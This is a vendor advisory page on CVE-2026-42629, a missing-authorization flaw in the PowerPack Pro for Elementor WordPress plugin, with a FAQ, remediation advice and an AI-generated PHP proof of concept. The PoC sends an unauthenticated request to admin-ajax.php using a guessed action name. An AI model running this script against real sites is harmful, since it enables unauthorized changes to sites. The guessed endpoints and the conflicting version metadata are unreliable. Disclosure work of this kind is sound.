What is CVE-2026-42629?

CVE-2026-42629 is a medium severity vulnerability in the PowerPack Pro for Elementor plugin for WordPress. It is classified as a Missing Authorization issue, allowing unauthenticated attackers to perform unauthorized actions on the site.

How does this vulnerability work?

The vulnerability arises from a missing capability check on certain functions within the plugin. This oversight allows attackers to send crafted HTTP requests to the plugin’s endpoints without needing authentication, potentially executing actions that should be restricted.

Who is affected by this vulnerability?

All users of the PowerPack Pro for Elementor plugin versions prior to 2.13.0 are affected. To check if your site is vulnerable, verify the plugin version in your WordPress dashboard.

How can I check if my site is using a vulnerable version?

Log into your WordPress admin dashboard, navigate to the ‘Plugins’ section, and locate PowerPack Pro for Elementor. The version number will be displayed next to the plugin name; if it is below 2.13.0, your site is vulnerable.

What should I do to fix this vulnerability?

To remediate CVE-2026-42629, update the PowerPack Pro for Elementor plugin to version 2.13.0 or later. This version includes the necessary capability checks to prevent unauthorized access.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 is classified as medium severity, indicating that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized actions on the site if exploited.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability could allow attackers to perform arbitrary actions such as modifying settings or triggering data exports. While the integrity impact is low, it could lead to site defacement or further attacks if combined with other vulnerabilities.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can send an unauthorized request to a likely vulnerable AJAX endpoint. It illustrates the lack of required authentication checks, enabling unauthorized actions without needing a nonce or user credentials.

What are AJAX endpoints and how are they related?

AJAX endpoints in WordPress are used to handle asynchronous requests from the front end. In this case, the vulnerability likely resides in one or more AJAX handlers that do not properly check user capabilities.

What is the role of capability checks in WordPress?

Capability checks, such as using `current_user_can()`, are essential for ensuring that only authorized users can perform certain actions. Without these checks, sensitive functions may be exposed to anyone, leading to security vulnerabilities.

Is there any way to mitigate the risk if I cannot update immediately?

If you cannot update the plugin immediately, consider disabling the plugin until a secure version is available. Additionally, review your site’s security settings and monitor for unusual activity.

Where can I find more information about this vulnerability?

For more details, you can refer to the official CVE database, security advisories from the plugin developer, or security blogs that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 18, 2026

CVE-2026-42629: PowerPack Pro for Elementor < v2.13.0 – Missing Authorization (powerpack-elements)

CVE ID CVE-2026-42629

Plugin powerpack-elements

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version v2.13.0

Patched Version —

Disclosed April 28, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-42629 (metadata-based): This vulnerability affects the PowerPack Pro for Elementor plugin for WordPress (slug: powerpack-elements) in all versions prior to v2.13.0. The issue is a Missing Authorization vulnerability with a CVSS 5.3 (medium severity) that allows unauthenticated attackers to perform unauthorized actions. The patched version is 2.13.0.

Root Cause: Based on the CWE-862 (Missing Authorization) classification and the description stating ‘missing capability check on a function,’ Atomic Edge research infers that one or more WordPress AJAX handlers, REST API endpoints, or admin-post actions in the plugin lack a `current_user_can()` or `wp_verify_nonce()` check. This is a common pattern where plugin developers register handlers via `add_action(‘wp_ajax_nopriv_…’, …)` or `add_action(‘wp_ajax_…’, …)` but forget to verify user capabilities for admin-level actions. Without access to the source code, Atomic Edge cannot confirm the exact function or hook, but the pattern is unambiguous: the plugin exposes functionality to unauthenticated users that should require a specific user role or capability.

Exploitation: An unauthenticated attacker can craft HTTP requests targeting the vulnerable endpoint. Likely attack vectors include sending a POST request to `/wp-admin/admin-ajax.php` with an action parameter specific to the PowerPack Pro plugin (e.g., `powerpack_elements_process_settings`, `ppro_ajax_save`, or similar). The attacker may also target REST API routes under `/wp-json/powerpack/v1/` or admin-post handlers. The exact action name is not confirmed from the CVE metadata, but the PoC below assumes a common pattern. The attacker does not need to provide any authentication tokens, nonces, or cookies.

Remediation: The fix requires adding proper capability checks to the affected function. Developers should use `current_user_can()` with an appropriate capability (e.g., ‘manage_options’ or ‘edit_posts’) and call `wp_verify_nonce()` to protect against Cross-Site Request Forgery. The patched version 2.13.0 likely implements these checks. Users must update to version 2.13.0 or later.

Impact: Successful exploitation allows unauthenticated attackers to perform arbitrary actions that the vulnerable function handles. Depending on the function, this could include modifying plugin settings, resetting configuration options, triggering data exports, or performing other administrative operations. The CVSS integrity impact is low (N/I:L/A:N), suggesting the attacker can modify some data but not all plugin data. Atomic Edge research assesses this as a medium-severity issue that could enable site defacement, plugin tampering, or further attacks if combined with other vulnerabilities.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-42629 - PowerPack Pro for Elementor < v2.13.0 - Missing Authorization

/**
 * This PoC demonstrates sending an unauthenticated request to a likely
 * vulnerable AJAX endpoint. The exact action name is inferred from common
 * plugin patterns. Adjust $target_url and $action as needed based on actual
 * source code or further research.
 */

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site

$action = 'powerpack_elements_save_settings'; // Inferred action name; may differ
$nonce = ''; // No nonce is required for unauthenticated exploitation

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => $action,
    // Additional parameters specific to the vulnerable function would go here
    'settings' => 'test_value'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
// Do not send cookies or Auth headers (unauthenticated)

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 && !empty($response)) {
    echo "[+] Target responded with HTTP 200. The request may have been processed.n";
    echo "[+] Response: " . substr($response, 0, 500) . "n";
} else {
    echo "[!] Target returned HTTP $http_code. Endpoint may not exist or requires nonce/other checks.n";
}

?>

Frequently Asked Questions

What is CVE-2026-42629?
Overview of the vulnerability
CVE-2026-42629 is a medium severity vulnerability in the PowerPack Pro for Elementor plugin for WordPress. It is classified as a Missing Authorization issue, allowing unauthenticated attackers to perform unauthorized actions on the site.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from a missing capability check on certain functions within the plugin. This oversight allows attackers to send crafted HTTP requests to the plugin’s endpoints without needing authentication, potentially executing actions that should be restricted.
Who is affected by this vulnerability?
Identifying vulnerable users
All users of the PowerPack Pro for Elementor plugin versions prior to 2.13.0 are affected. To check if your site is vulnerable, verify the plugin version in your WordPress dashboard.
How can I check if my site is using a vulnerable version?
Steps to verify plugin version
Log into your WordPress admin dashboard, navigate to the ‘Plugins’ section, and locate PowerPack Pro for Elementor. The version number will be displayed next to the plugin name; if it is below 2.13.0, your site is vulnerable.
What should I do to fix this vulnerability?
Recommended actions for remediation
To remediate CVE-2026-42629, update the PowerPack Pro for Elementor plugin to version 2.13.0 or later. This version includes the necessary capability checks to prevent unauthorized access.
What does the CVSS score of 5.3 indicate?
Understanding the severity rating
A CVSS score of 5.3 is classified as medium severity, indicating that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized actions on the site if exploited.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability could allow attackers to perform arbitrary actions such as modifying settings or triggering data exports. While the integrity impact is low, it could lead to site defacement or further attacks if combined with other vulnerabilities.
How does the proof of concept demonstrate the issue?
Technical demonstration of exploitation
The proof of concept shows how an attacker can send an unauthorized request to a likely vulnerable AJAX endpoint. It illustrates the lack of required authentication checks, enabling unauthorized actions without needing a nonce or user credentials.
What are AJAX endpoints and how are they related?
Understanding AJAX in WordPress
AJAX endpoints in WordPress are used to handle asynchronous requests from the front end. In this case, the vulnerability likely resides in one or more AJAX handlers that do not properly check user capabilities.
What is the role of capability checks in WordPress?
Importance of user permissions
Capability checks, such as using `current_user_can()`, are essential for ensuring that only authorized users can perform certain actions. Without these checks, sensitive functions may be exposed to anyone, leading to security vulnerabilities.
Is there any way to mitigate the risk if I cannot update immediately?
Temporary measures to reduce exposure
If you cannot update the plugin immediately, consider disabling the plugin until a secure version is available. Additionally, review your site’s security settings and monitor for unusual activity.
Where can I find more information about this vulnerability?
Resources for further reading
For more details, you can refer to the official CVE database, security advisories from the plugin developer, or security blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations